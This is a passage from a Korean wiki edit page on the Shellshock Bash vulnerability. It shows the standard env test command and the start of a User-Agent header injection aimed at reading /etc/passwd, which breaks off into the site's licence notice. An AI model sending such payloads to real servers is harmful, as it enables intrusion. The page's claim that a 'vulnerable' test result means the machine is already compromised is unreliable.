문서의 임의 삭제는 제재 대상으로, 문서를 삭제하려면 삭제 토론을 진행해야 합니다. 문서 보기문서 삭제토론 셸쇼크 (문단 편집) === 취약점 예제 === 다음 구문은 {{{CVE-2014-6271}}} 에서 최초 보고된 셸 쇼크 취약점 예제이다. {{{#!syntax sh $ env x='() { :;}; echo vulnerable' bash -c "echo this is a test" }}} Bash에서 해당 구문을 실행하였을때 다음과 같은 구문이 뜨면 해당 취약점에는 안전한 것이며 {{{#this,#e5e5e5 is a test }}} 이렇게 뜬다면 이미 악의적인 코드가 실행되어 계정이 탈취됐을 수 있으니 빠르게 포맷하도록 하자. {{{vulnerable this is a test }}} [[HTTP]] 헤더의 [[사용자 에이전트|User-Agent]] 부분을 다음과 같이 변조하면 '''계정 정보를 탈취 가능하다.'''[* 다만 {{{/etc/passwd}}}는 실제 비밀번호가 아닌 단순한 계정 정보, 유저 ID 등등만 저장한다. 실제 비밀번호는 {{{/etc/shadow}}}에 [[해시|해싱]]되어 저장되기에 만약 이런 일이 일어난다고 해도 1차적으로 시간을 벌 수 있다.] {{{#!syntax sh User-Agent:() { :; }; echo $(저장 버튼을 클릭하면 당신이 기여한 내용을 CC-BY-NC-SA 2.0 KR으로 배포하고,기여한 문서에 대한 하이퍼링크나 URL을 이용하여 저작자 표시를 하는 것으로 충분하다는 데 동의하는 것입니다.이 동의는 철회할 수 없습니다.캡챠저장미리보기